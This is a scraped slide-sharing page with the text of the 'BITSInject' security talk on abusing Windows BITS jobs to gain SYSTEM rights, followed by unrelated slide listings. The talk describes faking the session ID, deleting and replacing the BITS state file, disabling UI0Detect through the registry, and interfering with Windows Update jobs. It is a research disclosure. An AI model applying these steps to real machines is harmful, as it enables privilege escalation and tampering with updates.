bitsinject
play

BITSInject Control your BITS, get SYSTEM Dor Azouri Security - PowerPoint PPT Presentation

Mar 12, 2024 •188 likes •737 views

BITSInject Control your BITS, get SYSTEM Dor Azouri Security Researcher @SafeBreach Background Intelligent Transfer Service 2 A couple more bits about BITS Available since 2001 (Windows XP) Most known use: Windows Update Advanced

  1. BITSInject Control your BITS, get SYSTEM Dor Azouri Security Researcher @SafeBreach

  2. Background Intelligent Transfer Service 2

  3. A couple more bits about BITS Available since 2001 (Windows XP) Most known use: Windows Update Advanced features 3

  4. A couple more bits about BITS Available since 2001 (Windows XP) Most known use: Windows Update Advanced features 4

  5. DEMO Software updating itself using BITS 5

  6. TOOL DEMO #1 BITSInject to open an interactive shell as NT AUTHORITY\SYSTEM, in session 0 6

  7. 7

  8. BITS Background & Terms PowerShell bitsadmin 3rd-party 8

  9. BITS Background & Terms PowerShell bitsadmin 3rd-party BITS Job Download Upload Upload-Reply 9

  10. BITS Background & Terms PowerShell bitsadmin 3rd-party BITS Job Download Upload Upload-Reply COM Interfaces (C/C++) qmgrprxy.dll 10

  11. BITS Background & Terms PowerShell bitsadmin 3rd-party BITS Job Download Upload Upload-Reply COM Interfaces (C/C++) qmgrprxy.dll qmgr.dll 11

  12. BITS Background & Terms PowerShell bitsadmin 3rd-party BITS Job Download Upload Upload-Reply COM Interfaces (C/C++) qmgrprxy.dll qmgr.dll State File 12

  13. Known Malicious Uses BITS as a malware downloader As a persistency mechanism (e.g. DNSChanger/Zlob.Q) As C&C communication 13

  14. The inspiration? the way WU downloads and installs updates The drive? Jealousy … of how WU adds SYSTEM jobs 14

  15. Some of LocalSystem Privileges ● Can open the registry key HKLM\SECURITY and SAM ● On a DC - has unrestricted access to AD Domain Service ● Has the network privileges of the machine ● Covert identity 15

  16. Some of LocalSystem Privileges [SYSTEM whoami] - [Administrator whoami] = SeAssignPrimaryTokenPrivilege SeLockMemoryPrivilege SeTcbPrivilege SeCreatePermanentPrivilege SeAuditPrivilege 16

  17. The Abuse 17

  18. The Enabling Feature SetNotifyCmdLine 18

  19. Naive Try - PSEXEC bitsadmin /CREATE I_WANT_YOUR_SYSTEM bitsadmin /ADDFILE I_WANT_YOUR_SYSTEM http://site.com/software.exe c:\temp\software.exe 19

  20. God Created a Rock He Can’t Pick Up Unable to add file to job - 0x800704dd The operation being requested was not performed because the user has not logged on to the network bitsadmin /CANCEL I_WANT_YOUR_SYSTEM 20

  21. How does wuaueng do the things it does? CoSwitchCallContext to the COM intf of qmgr.dll qmgr!CJobManagerExternal::CreateJob -> qmgr!CJob::AddFile -> qmgr!CJob::Resume -> qmgr!CJob::Transfer -> qmgr!CJob::BeginDownload 21

  22. How does wuaueng do the things it does? CoSwitchCallContext to the COM intf of qmgr.dll qmgr!CJobManagerExternal::CreateJob -> qmgr!CJob::AddFile -> qmgr!CJob::Resume -> qmgr!CJob::Transfer -> qmgr!CJob::BeginDownload 22

  23. Going after wuaueng Compare flow of calls between wuaueng and bitsadmin 1. qmgr!CJobManagerExternal::CreateJob -- identical 2. qmgr!CJobExternal::AddFile -- identical, but: Exception is thrown here (0x800704dd) 23

  24. Going after wuaueng Compare flow of calls between wuaueng and bitsadmin 1. qmgr!CJobManagerExternal::CreateJob -- identical 2. qmgr!CJobExternal::AddFile -- identical, but: Exception is thrown here (0x800704dd) Reason: bad pairing of {Client SID} and {Session ID} Solution: Fake {Session ID} 24

  25. Checkpoint #1 - AccessCheck One of the functions at the heart of the Windows security model It is boolean: GRANT or DENY IServerSecurity::CoImpersonateClient ➔ Impersonation token is checked against the job’s security descriptor ➔ IServerSecurity::CoRevertToself ➔

  26. Checkpoint #1 - AccessCheck

  27. Checkpoint #2 - Active Logon BITS requires the requesting user to be logged on for a job to continue operation C:\Windows\system32>qwinsta SESSIONNAME USERNAME ID STATE TYPE DEVICE 0 Disc >console 1 1 Active Rdp-tcp 65536 Listen

  28. Faking Session ID {Client SID} = {Session ID} = 1 (From Job object) GetTokenInformation(12) SwitchToLogonToken CloneUserToken CLoggedOnUsers::FindUser({SID},...) in {Session ID} 28

  29. Faking Session ID {Client SID} = {Session ID} = 1 (From Job object) GetTokenInformation(12) SwitchToLogonToken {SYSTEM} is NOT logged on in session {1} CloneUserToken CLoggedOnUsers::FindUser({SID},...) in {Session ID} 29

  30. Faking Session ID 1. Breakpoint is placed just before the call to CJobManager::CloneUserToken 2. Run CMD/PowerShell as SYSTEM using psexec: Bitsadmin /create I_WANT_YOUR_SYSTEM Bitsadmin /addfile I_WANT_YOUR_SYSTEM <URL> <DestinationFile> 3. Got to breakpoint. Change the return value of the GetTokenInformation call to 0, which is the SYSTEM session ID (WinDbg): Memory change: [rsp+20h]=0 30

  31. Faking Session ID {Client SID} = {Session ID} = {Session ID} = 0 (From Job object) GetTokenInformation(12) SwitchToLogonToken CloneUserToken CLoggedOnUsers::FindUser({SID},...) in {Session ID} 31

  32. CNestedImpersonation::* Takes care of the token manipulations CNestedImpersonation::Impersonate(void) Uses ImpersonateLoggedOnUser(HANDLE hToken) ➔ The desired action is with impersonation, and then back to self 32

  33. public enum JOB_STATE { Queued, Connecting, Transferring, → Suspended, Error, TransientError, Transferred, Acknowledged, Cancelled, Unknown }; 33

  34. The State File is the Supervisor Represents the job queue C:\ProgramData\Microsoft\Network\Downloader\(qmgr0.dat|qmgr1.dat) Alternated update, current is: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS\StateIndex 34

  35. The State File ● Straight-forward e.g. string representation: 07 00 00 00 ‘S’ 00 ‘Y’ 00 ‘S’ 00 ‘T’ 00 ‘E’ 00 ‘M’ 00 00 00 CJob::Serialize(class CQmgrWriteStateFile &) calls CQmgrStateFiles::Write(void const *,ulong) for each job property ● Unencrypted ● Partially protected 35

  36. public enum JOB_STATE { Queued, Connecting, Transferring, Suspended, Error, TransientError, Transferred, Acknowledged, Cancelled, Unknown }; 36

  37. sc stop bits timeout 5 del /Q /F C:\ProgramData\Microsoft\Network\Downloader\* >> Put modified state file sc start bits 37

  38. 38

  39. 39

  40. SID Name (Level) Use Untrusted (0) S-1-16-0x0 Used by processes started by the Anonymous group. It blocks most write access. Low (1) Used by Protected Mode Internet Explorer. S-1-16-0x1000 Medium (2) Used by normal applications being launched while UAC is enabled. S-1-16-0x2000 applications launched UAC elevation, or if UAC is disabled and the user is an High (3) S-1-16-0x3000 administrator. System (4) Used by services and other system-level applications (Wininit, Winlogon, Smss...). S-1-16-0x4000 40

  41. Migration of the Queue Just copy-paste the state files between machines Windows 7 Header: F5 6A 19 2B 7C 00 8F 43 8D 12 1C FC A4 CC 9B 76 Windows 10 Header: 28 32 ED 09 A6 C7 E9 45 8F 6D 36 D9 46 C2 7C 3E 00 00 00 00 00 00 00 00 41

  42. 42

  43. A Cleaner Method Version Dependent Header State File Header Queue Header n++ Jobs Counter = n Job Header Job #0 Job Footer Job Header Job #x ... Job Footer Job Header Job #n Job Footer Queue Footer 43

  44. BITSInject Injects a job with LocalSystem as owner Job is removed when finished Allows editing some of the job’s parameters, more in the future 44

  45. Interactive Services Detection - UI0Detect sc stop UI0Detect reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Windows /v NoInteractiveServices /t REG_DWORD /d 1 /f sc start UI0Detect OR Non-interactive exe

  46. TOOL DEMO #2 BITSInject non-interactive command 46

  47. SimpleBITSServer A simple python implementation of a BITS server Can respond without a Content-Length header Accelerating the method by pushing job into the ERROR state * On Windows 10: Fake VSN to avoid network traffic 47

  48. The Enabling Conditions ● Relying on state file data without verification ● Lack of unique machine identification ● File permissions integrity ● Clear, straight-forward object serialization to disk 48

  49. Other Potential Abuses Interfere with a software update job: 1. WU-choking using file name exhaustion: C:\Windows\SoftwareDistribution\Download\GUID\BIT[0-9A-F]{1,4}\.tmp 49

  50. Other Potential Abuses Interfere with a software update job: 1. WU-choking using file name exhaustion: C:\Windows\SoftwareDistribution\Download\GUID\BIT[0-9A-F]{1,4}\.tmp 69,904 50

  51. Other Potential Abuses Interfere with a software update job: 1. WU-choking using file name exhaustion: 51

  52. Other Potential Abuses Interfere with a software update job: 1. WU-choking using file name exhaustion: BIT[0-9A-F]{1,4}\.tmp 2. Change job state using BITSInject.py 3. Completely remove a job from queue using BITSInjerct.py 52

  53. MSRC: “...A malicious administrator can do much worse things.” 53

  54. Links BITSInject (Tool code + Parser): https://github.com/SafeBreach-Labs/BITSInject SimpleBITSServer: https://github.com/SafeBreach-Labs/SimpleBITSServer Email: dor.azouri@safebreach.com Twitter: @bemikre 54

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

10.1 Active Learning Review What questions should be asked in order to collect best data?

10.1 Active Learning Review What questions should be asked in order to collect best data?

CS/CNS/EE 253: Advanced Topics in Machine Learning Topic: Active Learning 2: the myopic version-space shrinking strategy Lecturer: Daniel Golovin Scribe: Pete Trautman Date: 8 February 2010 10.1 Active Learning Review What questions should be

264 views • 4 slides
M.Sc. in Meteorology Synoptic Meteorology [MAPH P312] Prof Peter Lynch Second Semester,

M.Sc. in Meteorology Synoptic Meteorology [MAPH P312] Prof Peter Lynch Second Semester,

M.Sc. in Meteorology Synoptic Meteorology [MAPH P312] Prof Peter Lynch Second Semester, 20042005 Seminar Room Dept. of Maths. Physics, UCD, Belfield. Part 8 The Quasigeostrophic System These lectures follow closely the text of Holton

748 views • 51 slides
Development of Earthquake Early Warning System in Taiwan Nai-Chi Hsiao 1 , Yih-Min Wu 2 , Dayi

Development of Earthquake Early Warning System in Taiwan Nai-Chi Hsiao 1 , Yih-Min Wu 2 , Dayi

Development of Earthquake Early Warning System in Taiwan Nai-Chi Hsiao 1 , Yih-Min Wu 2 , Dayi Chen 1 , and Tzay-Chyn Shin 1 1. Central Weather Bureau (CWB), Taiwan 2. National Taiwan University, Taiwan April 22, 2009 Outline Introduction

540 views • 22 slides
measured by the CMS experiment in pp and PbPb collisions Wei Li for the CMS Collaboration Quark

measured by the CMS experiment in pp and PbPb collisions Wei Li for the CMS Collaboration Quark

Correlations and fluctuations measured by the CMS experiment in pp and PbPb collisions Wei Li for the CMS Collaboration Quark Matter 2011, Annecy, May 23-29 2011 Introduction Jet quenching Correlation measurements are powerful tools to:

749 views • 50 slides
Interacting Rings David Pierce July, Lyon Piet Mondrian, Tableau No. IV; Lozenge

Interacting Rings David Pierce July, Lyon Piet Mondrian, Tableau No. IV; Lozenge

Interacting Rings David Pierce July, Lyon Piet Mondrian, Tableau No. IV; Lozenge Composition with Red, Gray, Blue, Yellow, and Black The interacting rings in question arise from differential fields: ( K, 0 , . . . , m

572 views • 34 slides
Tree-level scattering amplitudes in N = 4 SYM from integrability Tomek ukowski Mathematical

Tree-level scattering amplitudes in N = 4 SYM from integrability Tomek ukowski Mathematical

Tree-level scattering amplitudes in N = 4 SYM from integrability Tomek ukowski Mathematical Institute, University of Oxford New Geometric Structures in Scattering Amplitudes University of Oxford 23.09.2014 Based on : L. Ferro, T, C.

450 views • 20 slides
Wreath product of graphs: topological indices and spectrum Alfredo Donno Universit` a Niccol`

Wreath product of graphs: topological indices and spectrum Alfredo Donno Universit` a Niccol`

Motivations Preliminaries Results Wreath product of graphs: topological indices and spectrum Alfredo Donno Universit` a Niccol` o Cusano, Roma Workshop on Algebraic Graph Theory and Complex Networks Universit` a di Napoli Federico II -

1.15k views • 70 slides
Automatic Control II: Summary and comments Hints for what is essential to understand the

Automatic Control II: Summary and comments Hints for what is essential to understand the

Automatic Control II: Summary and comments Hints for what is essential to understand the course, and to perform well at the exam. You should be able to distinguish between continuous-time ( c-t ) and discrete-time ( d-t ) systems!

271 views • 8 slides
R CP Measurements of Identified and Unidentified Charged Particles at High p T in Au+Au Collisions

R CP Measurements of Identified and Unidentified Charged Particles at High p T in Au+Au Collisions

R CP Measurements of Identified and Unidentified Charged Particles at High p T in Au+Au Collisions at s NN = 7.7 62.4 GeV in STAR Evan Sangaline for the STAR Collaboration UC Davis August 16th, 2012 Outline Introduction and

309 views • 19 slides
Machine Learning for Signal Processing Linear Gaussian Models Class 21. 12 Nov 2013

Machine Learning for Signal Processing Linear Gaussian Models Class 21. 12 Nov 2013

Machine Learning for Signal Processing Linear Gaussian Models Class 21. 12 Nov 2013 Instructor: Bhiksha Raj 12 Nov 2013 11755/18797 1 Administrivia HW3 is up . Projects please send us an update 12 Nov 2013 11755/18797 2

959 views • 65 slides
Edge Guarding Plane Graphs March 17, 2020 Paul Jungeblut, Torsten Ueckerdt I NSTITUTE OF T

Edge Guarding Plane Graphs March 17, 2020 Paul Jungeblut, Torsten Ueckerdt I NSTITUTE OF T

Edge Guarding Plane Graphs March 17, 2020 Paul Jungeblut, Torsten Ueckerdt I NSTITUTE OF T HEORETICAL I NFORMATICS A LGORITHMICS G ROUP KIT The Research University in the Helmholtz Association www.kit.edu Edge Guarding G = ( V , E )

666 views • 40 slides
t Prr r t r

t Prr r t r

t Prr r t r t t ss

707 views • 39 slides
I. Topology of knots and manifolds 2 Topological equivalence(s) - Homeomorphism : bijective

I. Topology of knots and manifolds 2 Topological equivalence(s) - Homeomorphism : bijective

Quantum invariants of knots and 3 -manifolds Clment Maria The University of Queensland June 2015 I. Topology of knots and manifolds 2 Topological equivalence(s) - Homeomorphism : bijective continuous function with continuous inverse. -

676 views • 41 slides
Fundamentele Informatica 1 (I&amp;E) najaar 2014

Fundamentele Informatica 1 (I&amp;E) najaar 2014

Fundamentele Informatica 1 (I&amp;E) najaar 2014 http://www.liacs.leidenuniv.nl/~vlietrvan1/fi1ie/ Rudy van Vliet rvvliet(at)liacs(dot)nl college 11, maandag 1 december 2014 6. Context-Free and Non-Context-Free Languages 6.1. The Pumping

439 views • 32 slides
p q q p x y y x !p (alt.) p x x x y p refl p x y refl p x unit-l y p

p q q p x y y x !p (alt.) p x x x y p refl p x y refl p x unit-l y p

x z p q q p x y y x !p (alt.) p x x x y p refl p x y refl p x unit-l y p p x p p p !p x inv-r x !p p y p !p p y inv-l y p !p x !p ? assoc w q r r p q x z p q y hcomp hfill

629 views • 9 slides
THE WORK OF C.T.C.WALL IN TOPOLOGY ANDREW RANICKI 90+ pap ers, 2+ b o oks T

THE WORK OF C.T.C.WALL IN TOPOLOGY ANDREW RANICKI 90+ pap ers, 2+ b o oks T

THE WORK OF C.T.C.WALL IN TOPOLOGY ANDREW RANICKI 90+ pap ers, 2+ b o oks T opics covered: cob o rdism groups, Steenro d algeb ra, homological algeb ra, manifolds of dimensions 3,4, 5, quadratic fo rms,

590 views • 17 slides
Path Planning: Bugs, Wavefront Robert Platt Northeastern University Start These notes contain

Path Planning: Bugs, Wavefront Robert Platt Northeastern University Start These notes contain

Path Planning: Bugs, Wavefront Robert Platt Northeastern University Start These notes contain materials from Peter Corke's book and from Howie Choset's lecture materials. Goal Problem we want to solve Given: a point-robot (robot is a

570 views • 30 slides
CSE 158 Lecture 1.5 Web Mining and Recommender Systems Supervised learning Regression

CSE 158 Lecture 1.5 Web Mining and Recommender Systems Supervised learning Regression

CSE 158 Lecture 1.5 Web Mining and Recommender Systems Supervised learning Regression What is supervised learning? Supervised learning is the process of trying to infer from labeled data the underlying function that produced the labels

751 views • 25 slides
two stiffness rigid flexible one-way or two-way structural systems, spatial

two stiffness rigid flexible one-way or two-way structural systems, spatial

A RCHITECTURAL S TRUCTURES : Structural Organization F ORM, B EHAVIOR, AND D ESIGN classifications ARCH 331 D R. A NNE N ICHOLS geometry F ALL 2018 line-forming surface-forming lecture two stiffness rigid flexible

335 views • 15 slides
902-135: TEN RUNG WALL Page 11 Rev. 1/22/04 PARTS LIST KKJJJ SPECIFICATIONS Ref Description

902-135: TEN RUNG WALL Page 11 Rev. 1/22/04 PARTS LIST KKJJJ SPECIFICATIONS Ref Description

902-290 6 Sectional Slide Page 1 Rev. 1/22/04 IMPORTANT PLEASE READ THESE INSTRUCTIONS BEFORE COMMENCING ASSEMBLY. All equipment must be installed in accordance with these instructions. Check your shipment against Bill of Lading and Parts

452 views • 12 slides
AIRS Profile Data Assimilation in WRF Brad Zavodsky, Shih-hung Chou, Gary Jedlovec SPoRT:

AIRS Profile Data Assimilation in WRF Brad Zavodsky, Shih-hung Chou, Gary Jedlovec SPoRT:

AIRS Profile Data Assimilation in WRF Brad Zavodsky, Shih-hung Chou, Gary Jedlovec SPoRT: NASA/MSFC NASA Sounder Science Team Meeting Greenbelt, MD October 14, 2009 1 transitioning unique NASA data and research technologies to the NWS

715 views • 13 slides
WIND &amp; CLOUDS Mt. Washington Observatory ATMOSPHERIC PRESSURE Weight of the air above a

WIND &amp; CLOUDS Mt. Washington Observatory ATMOSPHERIC PRESSURE Weight of the air above a

ATMOSPHERIC PRESSURE, WIND &amp; CLOUDS Mt. Washington Observatory ATMOSPHERIC PRESSURE Weight of the air above a given area p = F/A Measured in mb (millibars) Average Atmospheric Pressure at 0m (Sea Level) is 1013mb Your book PRESSURE 50

523 views • 30 slides
VERTEX magnets status Antoni Aduszkiewicz University of Warsaw EATM, October 6, 2015 Antoni

VERTEX magnets status Antoni Aduszkiewicz University of Warsaw EATM, October 6, 2015 Antoni

VERTEX magnets status Antoni Aduszkiewicz University of Warsaw EATM, October 6, 2015 Antoni Aduszkiewicz (University of Warsaw) VERTEX magnets status EATM, October 6, 2015 1 / 4 VERTEX-1 superconducting magnet fault The first week VERTEX-1

595 views • 4 slides
Reducing Latency in Multi-Tenant Data Centers via Cautious Congestion Watch The 49th

Reducing Latency in Multi-Tenant Data Centers via Cautious Congestion Watch The 49th

Reducing Latency in Multi-Tenant Data Centers via Cautious Congestion Watch The 49th International Conference on Parallel Processing (ICPP) 2020 Ahmed M. Abdelmoniem, Hengky Susanto, and Brahim Bensaou Outline Introduction and background

498 views • 31 slides

More recommend